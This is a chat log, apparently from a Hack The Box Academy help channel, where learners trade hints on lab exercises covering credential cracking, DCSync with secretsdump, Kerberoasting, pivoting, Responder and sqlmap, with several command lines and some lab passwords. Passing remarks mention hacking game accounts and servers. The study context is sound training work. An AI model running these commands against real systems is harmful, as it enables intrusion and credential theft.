#modules

Stuck at the Footprint Hard Lab, got the credentials from snmp, logged into mail server through imap and trying to display the message from inbox, however it gives me no information which I can use. Can you give me any tips?

How are you fetching the mail? I'm on mobile so the compression on that screenshot is absolutely fucked

1 FETCH 1 all

Switch all with body[]

I linked a blog for useful imap commands and stuff a while back

hi

thanks! ❤️

You can also get the email from pop3s

Just as an fyi

Imap is just nicer to navigate with

yes if available go for imap

Especially if you have to look through hundreds of emails

Better sorting

any hints how do I crack this hash. I used 2100 mode. Could not crack it with rockyou

link ?

to the section?

yes please

https://academy.hackthebox.com/module/143/section/1279

ah ok i am not yet there sorry

maybe try another wordlist

can you show the syntax ? dm is ok

or mask it

yea no problem

||hashcat -m 2100 admin.hash /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt||

looks right to me

v1

oh cool im doing v2 tomorrow

I'm not at this part yet but are you sure the mode is 2100? I ask cause I choose the wrong mode all the time and waste time trying to figure out what's wrong lol

im nervous af i dont do well on tests

the hash has $DCC2$10240# I check hashcat examples it was 2100

I guess if hashcat cannot do it there has to be another path

Ok cool just wanted to make sure you wouldn't believe how much time I've wasted and the only thing I did wrong was pick the wrong mode like a moron lol

try this at the end ||--force --potfile-disable||

gl with it, v1 was a fun exam

restart target

adter that im going for CBBH just like you did 😅

Tried that, port still closed. I'm thinking they are giving me the wrong VM

i already started the modules for it

Try with a regular scan, not syn

netcat -v ip 2121

Still closed... this is so weird.

Does it give you anything?

I also tried that, conncetion refused

I can interact with other services on the VM, so it can't be a connection issue

Weird, contact website support imo

Yeah, will do. Thanks for trying to help me

restart target and wait for 5-6 mins 🙂

The support doesn't really look at the discord

Good luck 🍀

thanks🥰

i took the ewpt after, but take my advice and dont take that. just do the cbbh like you plan

i already got the voucher for it

anyone studying introduction to Introduction to Digital Forensics ??

I tried to use mimikatz and do a dcsync and it was not possible because klist was empty any help?

no klist no ticket

was cbbh hard or fun? a week for a test seems a bit scary ngl

Why „or“?
An exam can be difficult and still be fun

yea I guessed so but what should I do according to BH only admin has dc rights

yeah i meant was it really hard or did the modules do the trick and he passed with confidence

both. if youre fairly new to hacking, expect to fail it. but dont give up on it. take your time studying through the material and take notes of your assessments/labs that you think are challenging

The modules contain all the knowledge you need for the exam. Nevertheless, the exam was difficult from my point of view.

dude I just switched and there was SRB cant miss a second here I guess

Damn that linked looked so tempting to click on too 😂

I wouldn't doubt that vid is NSFW btw, given their name. People do dumb shit "cosplaying" characters

well good to know thanks for the input guys

It was bloody roblox

oof

Hello Everyone. I am trying to complete the Footprint Lab - Hard but I am stuck. I am currently logged into the machine as tom but thats where I am stuck. I checked the bash history and I ran linPEAs. I feel like I am over thinking it

lol i went out for 5 secs and party is on

But yeah, #rules

Arguably worse

lmao

History is definitely important if I recall that lab

any help plis

too lazy to change it now

Perhaps seeing the services they interacted with is useful

i see tom logged into mysql but i am searching for a password

Just use his password

are you working as a pentester rn or is this just a hobby for you? (hope its not to personal😅 )

got damn it lol

im in appsec

cool

but work close to pen teams

i'm trying to find my first job as a junior but id really know how to search for it

you can dm me if you about whatever, dont want to get too off topic for the channel

ohhh ok

i forgot this is the modules channel sorry guys

idk the password. I am using a private key to log into the box

You should have his password too

if you donßt know it > crack it

You retrieved it from your walk

Footprinting, hard- no cracking

how can you renember all that 🙂 ?

the password was to login to the imaps. tried it with mysql and it didnt work

It should

ill try it again

Make sure you copy/paste it

got damn it lmao thanks @fathom pendant

Vaults within vaults of keywords and synapses

any help on how to crack lsa secrets?

or cached domain logon info?

did my "extension" not work ?

You'll have to consult a doctor for that

for the syntax lol

I think @next bronze has an lsa dump tool

you can dump lsa via cme nxc too

I have dumped it i just wanna crack it

this is what i got from admin at ms01

I need admin/inlane to dcsync according to bh

I tried to use mimikatz but there is no klist

So I finished AD Skills Assessment 1 last night, and I was going over my notes to review my process. I had a couple of questions but I wasn't sure how I could ask them without spoiling anything but to try to keep it as vague as possible and put it in spoiler tags: ||I wasn't able to upload Chisel to the web-shell host as the web-shell kept crashing so I instead tunneled via netsh and RDP which was fine but for the last questions I was definitely a bit lost on how to authenticate to the DC as I had to do it from the RDP Session I was in. After some googling and remembering that mimikatz can do PTH I used mimikatz and psexec.exe. And I was wondering was there another way to PTH in this scenario? Some sort of Powershell PTH? Also could I have used netsh.exe in a similar way but instead of forwarding the traffic to the RDP port, forward it to another port so I can then run tools from my attack host like secretsdump.py?||

this module is killing the little brain cells i have

are you having tunneling problems?
then fear not ligolo-ng is the tool for you

it low brain cell requirement makes it super easy to use and does not require admin
||shade|| : once I used it I was spoiled

Yeah I just wasn't able to upload certain tools through the web-shell it kept crashing and giving me an error. My initial plan was either Chisel or ligolo-ng which I haven't used yet but I was excited to try it out. Maybe I could've tried uploading the files to the webshell host in another way though

well we can try doing it again if you want my view. tho marcie and xre0us helped a bunch

hi, 'm in the Other Notable Applications, can anyone help me? i'm trying to catch rev shell

You know I was just thinking maybe I was trying to upload the files to a directory that didn't have write access and that may have been the error. I didn't even consider that because I was getting so frustrated so I just went ahead with netsh.exe

I will complete (hopefully) the skill assessment 2 and put this module to rest until the exam

Yeah I think I'm going to try doing that assessment again after I finish AD skills assessment 2 but this time make sure I get either chisel or ligolo running to make everything easier

assessment 2 is taking me a week to complete

i did many modules with pwnbox but now i use my vm

Yeah I've heard it can be tricky

I want to use it too but the lag is too much

rdp is pita 😉

even on my own vm

I thought of using ngrok and tunnel my connection with pwnbox

Right it's so annoying sometimes

but too much trouble

i will have a look intoo ligolo tomorrow

check john hammonds vid its detailed

as always 😄

oh cool I didn't know he a had a vid on ligolo I'm gonna go check that out right now

i will too after this : https://www.youtube.com/watch?v=wwmCHeYd1I4

damn

I put it in my watchlist

😉

john hammond missed this exam btw

I think he did a vid on this

I don't suppose anyone wants to DM me Kira's mutated password? Pretty please. I could have sworn I saved it somewhere. Hard lessons have been learned. Always save creds. Don't name files "hashyhash.hash2" and other variations of awful

he was sponsored if I remember

i don't know what is wrong

Nope, you can recrack it or look through the pot file for it

at least save it for the whole module .. i learned it today too

any hints for me plis

anything

It's what I deserve

5585 open ?

evil winrm?

maybe

Wait, what's a pot file...

I am using that to connect to admin but I want its domain acct

.potfile is where cracked hashes get saved

Oh wait you got kira's pw through bruteforcing a service

I have access to A and B. need to access C but only admin has dc rights. I tried to crack sql_svc hash it did not work

dm @sterile epoch

Just bruteforce ftp or something with the mutated list and wait

Yeah and I can almost see it in my head 🤣

¯_(ツ)_/¯

Yeah I remember I made the same mistake and had to do the bruteforce all over again never made that mistake again lol

Shouldn't take more than 10 minutes

Guess I gotta go back. Lesson learned

You don't learn lessons if someone just holds your hand and gives you something you should have saved

I always save credentials even before the module

Just a habit

Just during this module I started saving the results of everything too. So I'm extra sickened that one slipped through.

Fun module though!

I have a full creds.txt that gets updated per module with creds I find

I narrow standard/local users from /home/ and C:\Users

If I have a foothold*

I could with seeing a pros workflow cause things got confusing fast on the PTT.

Check out videos by ippsec 🙂

He does a good job of explaining his thought process

PTT was interesting because it deals with domain joined hosts/accounts

Not just local

Thanks! I will deffo do that

Good news guys. I found a file called......

kira

On my desktop

Gonna be an awesome hacker obvs

i tryied metasploit too

This is why I keep all my files separated

I have directories and such dedicated to the modules/sections

Yeah I think that was my first time jumping about different machines in this module and I realised I was wasting a lot of time trying to remember who was who and such. Those little inefficiencies bug me

trying to do a double pivot with ligolo-ng, getting this error:
error: a tunnel is already using this interface name. Please use a different name using the --tun option

Anyone got any advice?

The VM assosciated with the Attacking FTP section has the expected answers, did you try resetting the instance? Others have solved it very recently also. If you continue to face issues please raise it with our support department.

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

Also, that's a T2 module, so please avoid posting any spoilers @dense pewter 🙂

T0 is open season, but anything over that, please use discretion

Hi is there a channel I can ask a general question about a box?

#boxes

If it's an active box mind, do not post information that spoils the experience for others.

It says 🔒No Access for the provided link

It is an active box, I won't mention the name or any spoliers just a very generic question

Check out #welcome - to access other channels, you'll need to identify with an account on https://app.hackthebox.com

sweet thanks

Stop the pivot on session 1, start it on session 2; or create a new interface for it

new interface worked - cheers

btw : https://www.youtube.com/watch?v=qou7shRlX_s

Mr. Almond our hero?

be nice 🙂

if there is any cert .... john has it 🙂

Sorry, thought that adding spoilers would be enough.

He also failed his first cpts attempt due to not respecting the time commitment (he was moving at the time he started it)

Spoiler tags really don't do much, anyone can read them.

masking is ok ?

"masking" do you mean doing stuff like u*:p* for username:password and such?

as long as both parties understand what's being referred to

Yeah.. if it's not a direct spoiler, I think it's fine. That goes for things like usernames, passwords, tools etc, along with techniques

half the time it's just "read the section about x again"

or "you spelled it wrong, L + ratio"

can I pm regarding a general box inquiry?

Sorry, I can't give any guidance on content, HTB staff

Ook

#boxes

or if it's the recent box: #1205934783197356062

Module INFORMATION GATHERING - WEB EDITION
section Active Subdomain Enumeration
after starting the instance my Target: 10.129.79.219
question is Submit the FQDN of the nameserver for the "inlanefreight.htb" domain as the answer.
the solution i am trying is nslookup -type=NS inlanefreight.htb
but not getting required output
please guide me to follow proper approach to solve this task

you need to add the target ip after

nslookup -type=NS inlanefreight.htb ip

Hi everyone,
I'm doing Misc CSRF Exploitation in the ADVANCED XSS AND CSRF EXPLOITATION module and when I log in into the vulnerable app, I immediately got logged out and there is no ||Promote button||, does anybody know should it work like that?

Someone who did the Skill Assessment lab from Blind Sql injection module?
I would like to know how you scripted the first part 😄
(I don't need a nudge, already finished the lab)

Im currious. how am i 41% done with the course but only 18% on offensive and 7% on general

hello everyone im new here

there's more than just the pentester path

Do I introduce myself?

no this isn't a gen-chat

ohhh so the bubbles are combination of all

thank you buddy able to resolve this issue thanks alot

read #welcome and #rules

I have

your welcome

so what do u do in hack the box

there's instructions in #welcome to access more of the server

and #welcome explains the server

if you're talking about myself, personally, i just exist as another user in the framework

but that conversation isn't for this channel

ok

thank u

Just on the organisation thing we spoke about earlier, I found a recommendation for this pen test data management tool. https://github.com/KvasirSecurity/Kvasir

I haven't looked at the code

Module INFORMATION GATHERING - WEB EDITION
section Active Subdomain Enumeration
after starting the instance my Target: 10.129.79.219
question is Identify how many zones exist on the target nameserver. Submit the number of found zones as the answer
the solution i am trying is nslookup -type=any -query=AXFR inlanefreight.htb 10.129.79.219
but not getting required output
please guide me to follow proper approach to solve this task

hint: localhost/loopback

sorry did not get

what is the localhost/loopback ip

:)

https://www.cloudflare.com/learning/dns/glossary/dns-zone/

127.0.0.1

but in question its asking about total number of zones on name server

yes

count

:)

you mean in answer how many 127.0.0.1?

@mystic loom So, there is a tool in PowerSploit, which is indeed the answer

How to get to the answer? No idea. I think I discussed this with five other people, and everyone so far has brute-forced it

There might've been someone who actually knew the answer

Well.. Guess im part of the club now haha

hello there, happy Friday , did anyone have this issue, when was doing Citrix Breakout?

Can anybody help with the ADVANCED XSS AND CSRF EXPLOITATION module?

I do ty

there's not really a reason reason to crack lsass dumps, you get ntlm hash, which you cana pth, or kerberos tickets, which you can ptt

oh you dump lsa, not lsass

I did inveigh first and it did not work few hours later it reset I thought to try again and it worked I got the hash for user C but cannot login via evil-winrm

you don't have to get a shell to dcsync, read the dcsync section again

if that's what you want to do

but only administrator.inlane has dc permissions

I cannot get to admin.inlane

I dumped lsass and got a hash for inlane.admin

now I am stuck

I could not crack the hash and its not nt hash

do I meed -t48 when attacking ftp or can i use it without the -t option

-t is for threads to use you can omit it

yea ik but will it crash the system

with hydra

no default is 8 iirc

its not 8

try and see if it crashes just restart

how do ikno if it crashes tho will it tell me

hydra?

https://tenor.com/view/lets-just-do-it-kyle-broflovski-south-park-s11e11-season11ep11imaginationland-episode-ii-gif-910561380147033391

#modules message thats the closest I got to a sane solution

Module INFORMATION GATHERING - WEB EDITION
section Active Subdomain Enumeration
after starting the instance my Target: 10.129.79.219
question is Submit the number of all "A" records from all zones as the answer.
please guide me to follow proper approach to solve this task

any idea what to do?

bruh

you need to figure out this on your own; so far all you've done is ask questions on how to complete each task and doesn't feel like you've tried to do anything on your own

https://www.cloudflare.com/learning/dns/glossary/dns-zone/

anyone got the same problem in ACL part ?

Get-ADObject -SearchBase "CN=Extended-Rights,$((Get-ADRootDSE).ConfigurationNamingContext)" -Filter {ObjectClass -like 'ControlAccessRight'} -Properties * |Select Name,DisplayName,DistinguishedName,rightsGuid| ?{$_.rightsGuid -eq $guid} | fl
An error occurred while enumerating through a collection: The (&ObjectClass -like 'ControlAccessRight') search filter is invalid..
At C:\Tools\PowerView.ps1:6664 char:13

•         $Results | Where-Object {$_} | ForEach-Object {
  

•         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  

  • CategoryInfo : InvalidOperation: (System.Director...sultsEnumerator:ResultsEnumerator) [], RuntimeException
  • FullyQualifiedErrorId : BadEnumeration

Could someone help me with https://academy.hackthebox.com/module/77/section/843

I found an exploit for the target at exploitdb but i dont find it in msfconsole to exploit the target

is it a .rb file ?

its a .py payload

metasploit is .rb

do you have the creds of the user with GenericAll?

so how do i payload the target

with python(3)

yea I am trying to create a fake spn

I got it through inveigh

I was wondering if there is another way to get the hash. only dc came to mind

and inlane/admin has dc rights whose hash i have

I'm new to pentesting and usually all the necessary resources were always explained in the module

no, you got the hash through inveigh, the user was trying to authenticate MS01 and you captured the hash, it's not the same as other ways to get hashes

so I cannot get it through dc?

no problem. new to linux too ?

i tried different commands and i think i should get answer by nslookup -type=any -query=AXFR inlanefreight.htb 10.129.79.219 but unfortunately not get the required output

2 zones to query, add up the A records

yeah

you can but you'll need to be able to dcsync, and the hash type is also different, you can NTLMv2 through inveigh, which cannot be used for pth, for dcsync you get NTLM which you can

https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

thanks

haven't seen this before, just use powerview and resolveguid I guess

see you later in a few years when i finished reading

it will not take so long 🙂 keep going 🙂

yes like on the website

anyone can help me with Attacking Common Applications - Skills Assessment I? I found the flag, but i can't read

So is it possible in this environment then I would try to do it later

I wanna increase my attack vectors

but first i will sleep

gn

gn 🙂

it is possible when you dump everyone's hashes, unless the user is logged in elsewhere, you won't be able get their hash until you've compromised the domain

till now i have 3 users and one local machine admin still I cannot do dcsync. I guess I gotta wait till I have domain compromise

ok restartet the target ..... same error

so just started AD sills assessment II and I was just wondering is it possible to use Responder in tandem with Ligolo-ng?

from my testing ligolo can't forward smb traffic so no

it could work with chisel though

Fantastic, of course this isthe one time I decided to try Ligolo-ng

I mean responder you just run and forget, it's not like you need to do much else with it

As a hypothetical though, say Ligolo-ng could forward SMB traffic, what would the syntax be for Responder. Would the interface just be the name of the tun you created for ligolo?

should be localhost/127.0.0.1, ligolo forward those traffic to local ports

I tried using ligolo with smb it works

oh does it

yea I use it with smbclient

Okay good to know.

what's the set up? it didnt' work last time I've tested

I set a single pivot and use smbclient through my host thats how I got the mssql string

oh like smbclient to a remote host

ok chatgpt fixed it 😉

yea that works but not the reverse, so you can't receive traffic to your side through smb

yea if you wanna reverse it then you gotta port forward it

I don't even know why I asked my question, my dumb ass forgot that there is a literal Linux attack host that I can run Responder on. Boy this assessment is off to a good start lol

use listener_add --addr 0.0.0.0:445 --to 127.0.0.1:445 --tcp

or another port

i know, this doesn't work when I've tested it

I dunno then i gotta try reverse

it always works for other tasks

oh yea I remember I used responder

on it I got a hash let me try doing it again give me a min

ok my bad responder does not work

I am back to my assessment

ligolo ?

damn sometimes i do not know if the lag is so bad or the machine hangs 😄

is this :

Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid2} -Verbose

supposed to run for over 10 mins ?

for big domains it can take a while

you can use bloodhound

i know but i want to at least do everything once

iirc that took like 10+ minutes

i watched some YT vids to fill the void

yes family guy running 🙂

https://tenor.com/bcH1f.gif

this can be seen as spoiler

:P

mask it 🙂

sorry

"bloodhound shows I need C* to get to admin"

that's the point of the lab, if you can get admin then the genericall edge is pointless

ok, i use sharphound

done finally

I am free

i am here : ACL Abuse Tactics

okay is crackmapexec supposed to take an eternity to enumerate domain users, this thing has been running for like 25 minutes at this point I'm starting to wonder if it's even accurately enumerating real usernames

if the domain has a lot of user it will take longer, using ldap is a lot faster though

Now it feels like wasted time if I don't just let it finish lol

just open another terminal to run cme with ldap, whichever completes first

alright cme smb has a pretty good head start if ldap finishes before it that's crazy I'll give it a shot

Hey I am on lab Medium on footprinting and i have the sa:password for mssql and alex:pass for rdp but the studio doesnt have access i can guess it must be admin and looking on here others saying its admin so how do i obtain the admin password cause i have tried both passwords and will not work

run as admin: you have the password; alternatively rdp to administrator

thank you just got in it doesnt work copying and pasting have to rdp as admin

UAC doesn't like copy/paste

Thank you completed medium now i never used GUI of SQL hard to work out whats going. thanks again

I think SQLCMD is installed for CLI stuff

but also the GUI does have a button for query

Hey guys

Do I have to buy Minecraft to do the crafty ctf

2 things: Spoiler and no

this channel isn't for help with #boxes , read and follow #welcome

Tnx

Can someone give me a hint in the right direction for AD skills assessment 2. I've logged into SQL01 using mssqlclient.py, and now have to get to the Administrator desktop for SQL01 and MS01, probably gonna take a break right now because I'm starting to get frustrated but any hint would be appreciated

Has anyone else target ip been deploying for 15 mins now?

switch the vpn server and download a new vpn and respawn the target.

I dont have the option to terminate a target ip if its still loading

reload the page.

I ended my browser session and its still deploying @soft cedar

how come there are no cheat sheets for the soc analyst path?

inlanefreight.com

bruh

thats strange, try a hard reload: Ctrl + F5 or Shift +F5

i don't know what i should do i set my account i try ed to verify my email and nothing would happen so i completed Meow than i had to go afk when i got back i was longed out and i cant log back in so do i mack a new account or am i missing something

Message website support

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

thanks

Stuck on
WINDOWS PRIVILEGE ESCALATION: Citrix Breakout

Some body please help me with this syntax, googled it found nothing relevant

the second google result https://unix.stackexchange.com/questions/173916/is-it-better-to-use-pwd-or-pwd

or just echo $(pwd) and you'll know what it does

Aah forgot the basics

hi
im currently doing surveillance machine
and a found the CVE but idk what i have to change in the POC
in this line
" response = requests.post(url, headers=headers, data=data, proxies={"http": "http://10.10.14.31:8000"}) "

Hey gamers, anyone alive can help me with the XSS phishing module?

The payload doesnt work when I try sending my ip in the request but it works when I try sending anything else

It even works with a random post server when I try locally but whenever I send it in the /phishing/send.php form i always get Issue in sending URL!

@next bronze man this kerberos attacks assessment is weird. Finally had time to resume it. Tried netexec, no dice. Decided to try impacket on a whim, now impacket works lmao

oh well still a fun module all around

that is indeed weird, is it a problem with the lab? I did the SA again the other day and even ptt through impacket didn't work

did you use impacket for the last question or the local shell

just the local shell since I was already there

huh maybe they did change something, I think that didn't work for me the last time

whats super weird is I was proxychains so I can see that it hits port 389 successfully when it gets the machine information, but then the next request for 389 gets connection refused

┌──(kali㉿kali)-[~]
└─$ sudo proxychains /home/kali/.local/bin/nxc ldap 172.16.8.3 -k -u XXXXXXXXXX -p XXXXXXXXXXXXX --kerberoasting output.txt 
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.8.3:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.8.3:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.8.3:389  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.8.3:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.8.3:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.8.3:445  ...  OK
SMB         172.16.8.3      445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)                                                                                                                                                  
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  DC01.INLANEFREIGHT.LOCAL:389 <--socket error or timeout!
LDAP        172.16.8.3      445    DC01             [-] INLANEFREIGHT.LOCAL\XXXXXXXXXXXXXXXXX [Errno 111] Connection refused

same output if I dont request kerberos auth -k too

that is weird

I solved it!

So when using ssh -D with proxychains, some tools like netexec uses the remote pivot's dns for resolving hosts it seems.

I added the DC to the pivot /etc/hosts and it works

tbh it's been a while since I used ssh pivoting, can't say I've ran into that problem. but nice I'll keep it in mind

I normally dont use it either lmao

I'm pretty sure fox knows that, he used ssh for other reasons here

He already knows that I am sure xd

Hello, I have a small problem with the section. The first part in the interactive section, I don't know what the answer is. I tried everything

Damn I missed what it was I knew

ligolo

I think it's the interactive section but it doesn't work.

what module?

the introduction to academy

I'm sorry I just want to complete it, I'm a bit of a perfectionist

what is your the question and whats your answer?

what is the name of the first section of this module?

okey you´re right

sorry

iirc towards the end of the module it talked about navigating htb academy

😉

you already what the module is, so finding the first section in that module should be easy

thanks

sorry for wasting your time

you didn't, we are all here to help each other.

Intro to Network Traffic Analysis module, Tcpdump fundementals. "Given the capture file at /tmp/capture.pcap, what tcpdump command will enable you to read from the capture and show the output contents in Hex and ASCII? (Please use best practices when using switches)".Like I know what switch i need to read .pcap files AND to read them with ASCII. And if i use them both to read a .pcap file it works but when i enter them in as the answer it doesn't. stuck for a long time kindly help

The answer format is 's… t…… -.. /…………….'

thanks alot got it

Gulibó

@jolly cradle give me admin rank

hi 🙂 any recommendation for a vpn `? udp or tcp ?

for academy? usually tcp

sorry for academy, ok i´ll switch then 🙂

I found udp is much better for me

Just my preference, you could use icmp too

pings are way from good

sadly

choose a server closest to you

i use my own vm , i am from europe, i testet EU 1 and EU 2

tcp and udp

that should be pretty fast

tbh it was never fast 🙂 but ok ... rdp is total pita

and i am on 100 mbit+

ok i changed the mtu size to 1492 seems a bit better now

Hello everyone

Im doing Shells & Payloads module and im doing that question

Use what you learned from the module to gain a web shell. What is the file name of the gif in the /images/vendor directory on the target? (Format: xxxx.gif)

Once i request devices.php the service is hanging too much

Is there any roadmap for HTB what are their plans of courses etc?

afaik cwee is very soon, and they do have the advanced versions of cpts and cdsa planned

but no roadmap or forcast time

I think more evasion such as applocker bypass soon, if they don’t plan to release or no one did it. I am interested to write a module for them

I could also write some intermediate level of forensics and malware module if they want

you got it

can anybody tell me that how to start hacking, I'm a newbie.

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

ok seems like a eu vpn issue, us works ok

You should put something together and submit it. Who knows, maybe you'll be the next module author

This year is so busy, I need to do 12 certs… but maybe next year? Who knows

12 , now i am curious 🙂

I have already done 4 right now

anyone knows in "introduction to windows command line" "Skill Assestment part 3" what kind of flag should i find, it says only || "If you search and find the name of this host, you will find the flag for user2."|| But ive tried || "hostname" "systeminfo" "Get-ComputerInfo" || and i dont see anytging related with a flag. Even the hint just say || systeminfo ||

CRTL, CESC-AS, CWI-RTO…

OSED, OSEP, OSWE, OSWA, OSWP

i ma going for cpts, oscp and maybe BSCP

I think I will do oscp after osce3

sadly you can´t do oscp without the 90 days

I will buy unlimited

ok ping works, rdp doesnot

with udp vpn it does

Hi everyone, I'm doing the "password attack" module in the ptt section "from Linux", I became "root" but then I crashed, can you give me some tips?? Thank you 🙏

get root again?

"Perform a DCSync attack and look for another user with the option "Store password using reversible encryption" set. Submit the username as your answer."

can i get a nudge how to find the user please ?

Might be the wrong chanel but is it possible to use ssh intead of pwnbox?

and if yes, how?

idk

I remember it was an option before but now I can't find the ssh connect config anywhere

download vpn and connect

I dont know anything about computers ngl

module and section?

https://academy.hackthebox.com/module/143/section/1489

Hey guys,
Regarding the broken authentication module for timing attack exercise,
it does not make sense, everytime I'm getting different response time for different users, so how would be able to determine the correct guess?

I mean the command to find it is right there in the section

where is the general channel

wat is this beta name xd change my name back wtf

yes after svc_workstation I became root but then I crashed

and then you try again, similar to how you get up after you trip

unless you dont do so

yes, i found it , thx 🙂

lasagna is for windows only

last I checked they don't have support for linux anymore, you can try the python script though

I don't understand what you want to tell me... I don't understand the last questionnaire to answer

if u crashed when getting root, just try again

no... but from then on I don't know what to do

google it....

hm what could be wrong : ||secretsdump.py -outputfile inlanefreight_hashes -just-dc INLANEFREIGHT/adunn@172.16.5.5|| PW : ||-ync-aster7-7||

https://academy.hackthebox.com/module/143/section/1489

what's wrong with it

Password:
[-] RemoteOperations failed: [Errno Connection error (172.16.5.5:445)] [Errno 111] Connection refused
[*] Cleaning up...

that should be a part of your initial messaege
did you pivot

ah lol

dumb

sorry

if you do it right it works 😉

could probably use pyinstaller to convert it to a binary

s

F

up?

check dms

<@&861185840277487616>

check dms

no

@spring tundra

dam i got warend

warned

leave

did he just got banned?

i hope so

thats genually side

sad*

what did he do?

I have taken care of it

he probably come back later

i was askes some times in dm of this

hacking a roblox account lol

aint no way

honestly not suprised at all

i hacked a mincraft server the last days 😉

@astral inlet You can block him in your settings. Then he can no longer send you messages

Somebody please correct me..!!
Why this smbserver.py is not working..!!!

i set him on ignore 🙂

tbh i do a share with remmina

got question for you

are easy machines easy for you, like....can you just go and after 20 minutes be like "alr i got the root flag as well"

cuz its so fucking hard for me

on htb ? no

they are so hard even for beginner

i gotta constantly follow write ups to just even progress

as a beginner i would take other resources

can't see the error, scroll down. also you can use $(pwd) in your smb server command to start a share in the current dir, that's what it's for

tryhackme?

i dont get your point

thm is easier, yes

idk...either way, all the easy machines fuck me up cuz im too stupid for them

htb has starting point and academy, both are more beginner friendly

ik but still easy machines are pain

i got 1 more machine in starting point

and im doing with 2nd tier

hacking is getting experience and then use it to modify what you learned , it takes time

i am on it since 8 month now

do you try more or you learn more

i try everthing for lets say 30-60 mins if i can´t get anwhere i look into walkthroughs

Hello folks. Can you help me with the info regarding cron jobs. If I have cronjob that runs on the beginning of every month, then computer got shutdown and turned on 3 or 4th day of the month will the script that was scheduled on 1st day of the month run?

fixed

Need to use sudo -su then rest

do more, you'll get the hang of it

no https://serverfault.com/questions/52335/job-scheduling-using-crontab-what-will-happen-when-computer-is-shutdown-during

and don´t watch "first blood" on new machines 😄

i literally followed write up for devvortex and when i try to get hold of the sql server, it just does nothing and i all i type just does nothing and i gotta restart it

isn't devvortex still an active machine.. you should do retired machines if you want to follow writeups, and learn from the boxes, don't just blindly follow them

Thank you, that was what I needed

the older ones are easier

its a free one, but tnx for the tip to follow retired one

hopefully

Little help in WINDOWS PRIVILEGE ESCALATION: Citrix Breakout

Trying to run PowerUp.ps1 by as per the section but have no permissions

trying to escalate priv by using powerup.ps1 as mentioned in the section

trying to runn powershell in administrator asks password which i dont have..!

@rustic sage any idea regarding this?

read the error, what can you do about that?

advice: try to figure out things on your own instead on relying here all the time

sorry if i offended in some way..

but with this particular section i have been stuck from yesterday

I generally ask question here if i don't get something for lonnnnggg...!!!!!!

It's ok..!

I'm not offended, I'm saying you won't learn if you keep asking for help instead of trying other things

use the module, google and brain

"execution of scripts is disabled" what can you do about that?

I need to enable them through registry by show how..!

i took wireshark, looked matched proto. answer on hand in on first lines, but enabling http-log gave me empty files.

Did you found answer? i m do not get: i need paste content value from detection string or it is in packet. C___e is format only , not what you should find?

Yes I did. I included the hint on my message

question : are those questions in cpts exam quite the same "level" as in the path ? i find some questions missleading tbh

It's nothing like that. More akin to the prolabs, or to a much lesser extent the machines.

ok i wanted to solve dante before entering cpts

Anyone can support in this question

Create a token on the web application exposed at subdirectory /question1/ using the Create a reset token for htbuser button. Within an interval of +-1 second a token for the htbadmin user will also be created. The algorithm used to generate both tokens is the same as the one shown when talking about the Apache OpenMeeting bug. Forge a valid token for htbadmin and login by pressing the "Check" button. What is the flag?

I tried to convert the printed date to timestamp then run the script with an internal +-5 seconds then convert it to ms
then md5(htbadmin{timestamp})
and send it, it's not working

Did I miss anything?

it's actually +-1 second, and you'll need to convert the epoch time to the server time in utc

Can DM you?

Remember that 1000 tokens are generated every second. So you have generated 10000 tokens and also sent 10000 requests to the web server...

You mean something related to rate limiting?

No, but I don't know how strong the machines are. It must first be possible to process 10,000 requests instead of 2,000.

I used this JS code to convert it from UTC/GMT to localtimezone

var utcDateString = "2024-02-17 15:24:58";
var utcDate = new Date(utcDateString);

console.log(utcDate.getTime() / 1000)

but still wrong token

ok solved .... i love troubleshooting 🙂

hey guys i have a question,
im currently doing the" network enumeration with nmap" module and at "Host and port Scaning" i got to the question " Find all TCP ports on your target. Submit the total number of found TCP ports as the answer."

I know that i have to use nmap and the flag -Pn to get to the answer, but somehow doing it on the pwnbox the ports to find are shown open, but on my own vm it takes forever to scan and when i search for a specific port , eg. 80 it shows as unfiltered, allthough in pwnbox it is shown as open.

Anyone know what the issue is here`?

"unfiltered" just means there's no firewall

¯_(ツ)_/¯

but also: don't run your tests with Pwnbox and vm at the same time

if you're testing with your vm make sure the Pwnbox is powered off

yes i am doing that, i run both seperately

if you do ip a do you only have 1 vpn connection?

i m sorry im not sure how to identify if theres only one

qlmap -u "192.168.0.20:8081/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D nexust_joomla -T #__users -p list[fullordering]

im having a problen because the table starts with # im getting this sql error:
sqlmap: error: -T option requires 1 argument

help

tun interfaces

it's likely it's interpreting the # as a bash comment, try using single quotes or escaping the #

single quotes did not help how can i escape the # ?

\

didnt work

only one tun0 is shown

you can also likely put it into a file and have it call from a file maybe? ¯_(ツ)_/¯

Can anyone help with module "Pass the Ticket (PtT) from Linux".
The Optional Exercises "Transfer Julio's ccache file from LINUX01 to your attack host. Follow the example to use chisel and proxychains to connect via evil-winrm from your attack host to MS01 and DC01. Mark DONE when finished."

I have modified /etc/hosts file and also /etc/proxychains4.conf file.

I am unclear what chisel does. Is chisel to help transfer the ccache file to my box?

When I try to run proxychains4, I get an error.

What am I doing wrong?

chisel is a pivoting tool

still have the same problem

if you have burp intruder running: it's stopping the request until you forward it

do you think am i stupid MarcieLee

no, just a suggestion based off others experiences

;/

not not the case thx too

don't jump straight to an assumption

